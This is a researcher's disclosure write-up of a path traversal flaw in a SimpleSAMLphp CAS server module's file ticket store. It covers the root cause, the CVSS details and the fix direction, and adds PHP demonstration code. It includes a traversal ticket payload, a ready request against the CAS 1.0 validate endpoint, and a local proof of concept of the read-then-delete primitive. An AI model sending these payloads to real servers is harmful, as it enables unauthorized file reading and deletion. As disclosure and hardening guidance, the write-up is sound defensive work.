CVE-2026-46491: Path traversal in SimpleSAMLphp casserver FileSystemTicketStore

I reported a path traversal vulnerability in simplesamlphp-module-casserver that was published as CVE-2026-46491 / GHSA-jrrg-99xh-5j2q.

The issue affects deployments that use the file-based CAS ticket store. In that configuration, attacker-controlled CAS ticket identifiers were used as raw filesystem path components. Because the identifiers arrive through public CAS validation inputs, an unauthenticated remote attacker could escape the configured ticket directory.

Advisory

  • CVE: CVE-2026-46491
  • GitHub Advisory: GHSA-jrrg-99xh-5j2q
  • Package: simplesamlphp-module-casserver
  • Affected versions: <= 7.0.2
  • Patched version: 7.0.3
  • Severity: High (CVSS 3.1 base score 8.6)
  • CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
  • CWE: CWE-22: Improper Limitation of a Pathname to a Restricted Directory

Root Cause

The vulnerable ticket store built paths by concatenating the configured ticket directory and the ticket identifier supplied by the CAS request.

Conceptually, the vulnerable pattern looked like this:

    $filename = $ticketDirectory . '/' . $ticketId;

That is dangerous when $ticketId comes from a public request parameter. A ticket value containing traversal segments, for example ../target.serialized (sent URL-encoded as ..%2Ftarget.serialized), resolves to a file outside the intended ticket directory.

The file-backed store used the constructed path in both read and delete operations:

  • getTicket($ticketId) read the file at the constructed path and passed its content to unserialize().
  • deleteTicket($ticketId) unlinked the same constructed path.

Because the public CAS validation and proxy endpoints pass attacker-controlled ticket or pgt values straight into this store, the bug was reachable without any SimpleSAMLphp authentication, let alone administrator access.

Why CAS 1.0 Was Important

The strongest demonstrated impact was in the CAS 1.0 validation flow.

In that flow, the ticket is first loaded from the ticket store, and then the same ticket identifier is passed to deleteTicket() before semantic validation of the ticket (the checks that decide whether it is a genuine, usable ticket) has completed.

That matters because a traversal ticket ID can point at a file outside the ticket cache. getTicket() returns a nullable array, so any file that is readable by the PHP process and whose content unserializes to an array passes the only check that stands between the load and the delete. In that case the code reaches the unlink of the attacker-selected file.

A public request shape for the relevant CAS 1.0 path is:

    GET /cas/validate?ticket=..%2Ftarget.serialized&service=https%3A%2F%2Fservice.example.org

The deletion impact is conditional. It depends on the PHP process filesystem permissions and on the target file containing serialized data that can be handled by the ticket flow. The report did not claim arbitrary file deletion in every deployment.
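To make the root cause and the CAS 1.0 ordering concrete, here is an added PHP illustration (my reconstruction for this post, not the casserver module's own code). The class is reduced to the vulnerable pattern described above: the ticket ID is concatenated onto the directory, getTicket() unserializes whatever file that names, and deleteTicket() unlinks it. The driver then mimics what the CAS 1.0 handler does with the decoded ticket parameter, load first and delete second. The directory layout, file names and class name are all constructed for the demo.

```php
<?php
// Added illustration, not the casserver module's code. The layout below is
// constructed: <base>/tickets is the configured ticket store and
// <base>/target.serialized is a file that should never be reachable.

final class VulnerableFileTicketStore
{
    public function __construct(private string $ticketDirectory) {}

    // The vulnerable pattern: the request-supplied ID becomes a path component
    // with no validation, so "../x" steps out of the ticket directory.
    private function pathFor(string $ticketId): string
    {
        return $this->ticketDirectory . '/' . $ticketId;
    }

    // Reads and unserializes whatever file the constructed path names.
    public function getTicket(string $ticketId): ?array
    {
        $filename = $this->pathFor($ticketId);
        if (!is_file($filename)) {
            return null;
        }
        $ticket = unserialize((string) file_get_contents($filename));
        return is_array($ticket) ? $ticket : null;
    }

    // Unlinks the same constructed path, again without any containment check.
    public function deleteTicket(string $ticketId): void
    {
        $filename = $this->pathFor($ticketId);
        if (is_file($filename)) {
            unlink($filename);
        }
    }
}

$base = sys_get_temp_dir() . '/casdemo-' . bin2hex(random_bytes(4));
mkdir("$base/tickets", 0700, true);
// Constructed "victim" file: serialized PHP data that unserializes to an array,
// which is exactly the shape getTicket() is willing to return.
file_put_contents("$base/target.serialized", serialize(['cache' => 'important']));

$store = new VulnerableFileTicketStore("$base/tickets");

// What the CAS 1.0 validate handler effectively does with
// ?ticket=..%2Ftarget.serialized after the query string is decoded:
$ticketId = '../target.serialized';
$ticket = $store->getTicket($ticketId);      // reads <base>/target.serialized
if ($ticket !== null) {
    // The nullable-array check is satisfied, so the flow proceeds to delete
    // before the ticket has been semantically validated.
    $store->deleteTicket($ticketId);         // unlinks <base>/target.serialized
}

printf("ticket loaded from outside the store: %s\n", $ticket !== null ? 'yes' : 'no');
printf("target file still exists: %s\n", file_exists("$base/target.serialized") ? 'yes' : 'no');

// cleanup of the constructed layout
@unlink("$base/target.serialized");
rmdir("$base/tickets");
rmdir($base);
```

Run it with a PHP 8 CLI. The two printed lines show the two halves of the finding: the sibling file was read and unserialized through the store, and it was then removed by the delete step that the CAS 1.0 flow reaches before validation finishes. Replace the constructed target with a file the PHP process cannot read, or whose content does not unserialize to an array, and the delete is never reached, which is the conditionality described above.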

Impact

In affected deployments, a remote attacker can make the CAS server access files outside the configured file-ticket directory.

The confirmed impact was:

  • out-of-ticket-directory read and unserialize() of files containing serialized PHP data;
  • conditional deletion of attacker-selected files through the CAS 1.0 validation path;
  • destruction of CAS ticket files or other serialized SimpleSAMLphp runtime/cache files when filesystem permissions and file contents allow it.

The unserialize() call is also a dangerous secondary primitive if an attacker has another way to place a serialized object file at a reachable path. I did not claim a complete PHP object injection or RCE chain for this advisory.

Fix Direction

The fix should ensure that ticket identifiers are never used as raw filesystem paths.

Defensive patterns include:

  • reject ticket IDs containing path separators, dot-dot segments, NUL bytes, or values outside the expected CAS ticket format;
  • derive filesystem names from a safe encoding or hash of the ticket ID;
  • canonicalize resolved paths and enforce that they remain under the configured ticket directory;
  • use safer unserialization options where possible, for example disallowing classes;
  • only delete files that have already been proven to be valid in-directory ticket files.
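The following is an added PHP sketch of those five patterns applied together; it is my illustration for this post, not the patched casserver code, and the accepted ticket format (the regex), the class and method names, and the on-disk file naming are all assumptions made for the demo.

```php
<?php
// Added illustration of the defensive patterns above, not the project's patch.
// Assumptions: the ticket-ID regex, the class/method names and the hashed
// file naming are all chosen for this demo.

final class HardenedFileTicketStore
{
    // Assumed CAS ticket shape: a known prefix, a dash, then a safe charset.
    // Anything with '/', '\', '..', NUL or other bytes fails this check.
    private const TICKET_PATTERN = '/\A(?:ST|PT|PGT|PGTIOU|TGT)-[A-Za-z0-9_-]{1,128}\z/';

    private string $ticketDirectory;

    public function __construct(string $ticketDirectory)
    {
        $real = realpath($ticketDirectory);
        if ($real === false || !is_dir($real)) {
            throw new RuntimeException('ticket directory does not exist');
        }
        $this->ticketDirectory = $real;   // canonical, no trailing slash
    }

    // Pattern 1: reject anything that is not a well-formed ticket ID.
    private function assertTicketId(string $ticketId): void
    {
        if (preg_match(self::TICKET_PATTERN, $ticketId) !== 1) {
            throw new InvalidArgumentException('malformed CAS ticket identifier');
        }
    }

    // Pattern 2: the ID is never a path component; its hash is.
    private function pathFor(string $ticketId): string
    {
        $this->assertTicketId($ticketId);
        return $this->ticketDirectory . '/' . hash('sha256', $ticketId) . '.ticket';
    }

    // Pattern 3: canonicalize and enforce containment before any read or unlink,
    // so a future change to pathFor() cannot silently reintroduce traversal.
    private function assertInsideStore(string $filename): string
    {
        $real = realpath($filename);
        if ($real === false) {
            throw new RuntimeException('ticket file not found');
        }
        $prefix = $this->ticketDirectory . '/';
        if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
            throw new RuntimeException('ticket path escapes the ticket directory');
        }
        return $real;
    }

    public function addTicket(array $ticket): void
    {
        file_put_contents($this->pathFor($ticket['id']), serialize($ticket), LOCK_EX);
    }

    public function getTicket(string $ticketId): ?array
    {
        $filename = $this->pathFor($ticketId);
        if (!is_file($filename)) {
            return null;
        }
        $real = $this->assertInsideStore($filename);
        // Pattern 4: no object instantiation on the way back in.
        $ticket = unserialize((string) file_get_contents($real), ['allowed_classes' => false]);
        return is_array($ticket) ? $ticket : null;
    }

    public function deleteTicket(string $ticketId): void
    {
        $filename = $this->pathFor($ticketId);
        if (!is_file($filename)) {
            return;
        }
        // Pattern 5: only a proven in-directory ticket file is ever unlinked.
        unlink($this->assertInsideStore($filename));
    }
}

// Constructed demo: a valid ticket round-trips, traversal-shaped IDs are refused
// before any filesystem call is made.
$dir = sys_get_temp_dir() . '/casdemo-' . bin2hex(random_bytes(4));
mkdir($dir, 0700, true);
$store = new HardenedFileTicketStore($dir);

$store->addTicket(['id' => 'ST-demo-1', 'service' => 'https://service.example.org']);
printf("round trip: %s\n", $store->getTicket('ST-demo-1')['service']);
$store->deleteTicket('ST-demo-1');

foreach (['../target.serialized', "ST-x\0", 'ST-a/b', '..', 'ST-a\\..\\b'] as $bad) {
    try {
        $store->getTicket($bad);
        echo "accepted (unexpected): $bad\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ' . addcslashes($bad, "\0..\37") . "\n";
    }
}
rmdir($dir);
```

The ordering matters: the regex check runs inside pathFor(), so both getTicket() and deleteTicket() reject a bad ID before touching the disk, and the realpath() containment check compares against the directory with a trailing slash so that a sibling directory sharing the same prefix (tickets2 next to tickets) is not accepted. Hashing the ID also means the on-disk name carries no attacker bytes at all, which is what removes the CWE-22 surface rather than merely filtering it.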

This post is licensed under CC BY 4.0 by the author.